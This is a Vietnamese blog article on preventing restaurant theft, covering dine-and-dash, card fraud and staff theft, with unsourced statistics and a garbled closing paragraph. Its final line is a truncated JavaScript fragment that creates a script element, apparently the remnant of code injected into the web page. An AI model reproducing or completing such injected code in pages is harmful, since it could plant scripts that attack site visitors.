Bất chấp sự tưởng tượng của bạn rằng nhà hàng của mình là an toàn thì các vụ trộm vẫn có thể xảy ra. Trong blog tổng kết của nhà hàng O’Dell đã có 50 cách mà nhân viên trộm cắp từ nhà hàng được liệt kê. Những cách như để những thứ đồ trộm cắp trong giầy, hay “Chiếc chai Phantom của các bartender – họ sẽ để tiền kiếm được từ khách hàng vào những chiếc chai rỗng và mang chúng về nhà”.
Các bartender và nhân viên phục vụ có thể thông đồng với nhau và có thể có hàng triệu cách trộm cắp xảy ra hàng ngày tại nhà hàng hàng ngày. Đơn đặt hàng giả, gian lận thẻ tín dụng hay gian lận hàng miễn phí là một loạt các vấn đề phổ biến mà các nhà hàng phải đối mặt.
Vì vậy hãy chuẩn bị những cách hiệu quả để phòng và chống các hành vi trộm cắp tại nhà hàng của bạn.
PHÒNG TRÁNH HÀNH VI ĂN KHÔNG TRẢ TIỀN (DINE AND DASH)
Thuật ngữ Dine and Dash trong lĩnh vực nhà hàng có nghĩa là khách ăn xong rồi bỏ đi, không thanh toán tiền. Đây là hành vi sai trái mà nhiều nước xem là hành vi ăn cắp và phải bị trừng phạt. Bạn cần xử lý những khách hàng này tình thế hơn trong phim và truyện tranh với hình ảnh những người phục vụ đuổi theo những chiếc xe dine and dash.
Thật không may, những vị khách ăn không trả tiền này luôn là một thử thách của các nhà hàng. Khi gặp phải những vị khách này, các chủ nhà hàng cần biết rằng sẽ là phạm pháp nếu bạn trừ lương của nhân viên khi trước đó không có nhắc nhở hay thông báo nào về các trường hợp như vậy. Đó là một ý tưởng tồi (hay thậm chí là vô lương tâm) khi bắt nhân viên phải trả tiền vì việc mà bạn không thông báo trước cho họ. Đây là một rủi ro xảy ra thường xuyên tại các nhà hàng.
Hãy dành ra một phần nhỏ trong ngân sách của nhà hàng để chuẩn bị cho rủi ro ăn không trả tiền. Ngoài ra bạn cũng cần một số biện pháp ngăn ngừa hành vi này:
- Video giám sát: lối vào / lối thoát hiểm, khu vực đậu xe (hay thậm chí là khu vực để rác nữa) tất cả nên được lắp đặt các máy quay phim giám sát nếu bạn quyết định dành ra một ngân sách đáng kể để ngăn chặn những tên trộm.
- Một nhân viên đứng ở cửa trước: nhân viên này cần nhìn bao quát được nhà hàng để đánh giá tình hình khách hàng đang phải chờ đợi, tình trạng bàn và các hành vi trộm cắp. Đương nhiên, vị trí của nhân viên này tại cửa cũng thuận lợi trong việc ngăn chặn các vị khách ăn không trả tiền.
- Sử dụng một lối vào duy nhất: Lối ra vào duy nhất giúp rất nhiều trong việc ngăn chặn các khách hàng ăn quịt.
PHÒNG TRÁNH THẺ TÍN DỤNG GIẢ

Việc gắn chip và pin vào thẻ thanh toán sẽ giúp khách hàng và nhà hàng tránh khỏi những lỗ hổng trong thanh toán bằng thẻ.
Các mô hình thanh toán tín dụng hiện nay vẫn còn nhiều thiếu sót và có rất nhiều lỗ hổng để gian lận. Vậy làm thế nào bạn có thể bảo vệ mình? Hãy nhập chip và pin, hay còn được gọi là công nghệ “thẻ thông minh”. Khi thẻ tín dụng và thẻ ghi nợ có chứa một con chip, sẽ rất khó để thực hiện các hành vi gian lận.
PHÒNG TRÁNH NHÂN VIÊN TRỘM CẮP
Có một sự thật đáng buồn là: các thống kê báo cáo rằng tại Mỹ có 75% đến 85% các hành vi trộm cắp tại nhà hàng là do nhân viên gây ra và số tiền mất mát lên đến 6.000.000 $ và 4% doanh số bán hàng. Ngoài ra, lượng bia rượu bị lãng phí do đổ tràn hoặc bỏ thừa cũng chiếm một phần đáng kể 23% rượu và bia tươi, 10% rượu vang và 2% bia đóng chai.
Dù do vô tình hay cố ý thì những hành vi này cũng đang diễn ra dưới rất nhiều hình thức. Cho dù đó là hành vi ăn cắp trực tiếp, cho miễn phí các đồ ăn, hoặc mưu mẹo với tài chính, có rất nhiều cách để nhân viên có thể chiếm đoạt lợi nhuận từ bạn. Dưới đây là một số cách ngăn chặn hành vi trộm cắp nội bộ trong nhà hàng:
- Hàng tồn kho: Thực hiện kiểm kê tất cả các hàng hóa của bạn một cách thường xuyên là một thực tế không thể thiếu trong ngành kinh doanh ngành nhà hàng. Hãy luôn để mắt vào nguồn cung cấp của bạn.
- Thiết lập hệ thống bảo mật POS: Các thiết bị quan trọng nhất mà bạn có thể sử dụng để ngăn chặn hành vi trộm cắp là một hệ thống POS theo dõi hàng tồn kho, dòng tiền, bán hàng và lời khuyên. Thêm vào đó, nó cũng cung cấp giải pháp quản lý các lỗ hổng, giảm giá và các mặt hàng cần loại bỏ.
Trong mọi trường hợp, việc chống lại hành vi trộm cắp tại một nhà hàng bắt đầu với khi tiến một nền văn hóa nhà hàng truyền cảm hứng cho sự gắn kết và lòng trung thành giữa các nhân viên, chính sách để bảo vệ lợi ích của công ty và những cân nhắc về ngân sách, và kết thúc với một POS mà chiếm và cung cấp quản lý với một kỷ lục của tất cả các giao dịch chi tiết.
var d=document;var s=d.createElement(‘script’);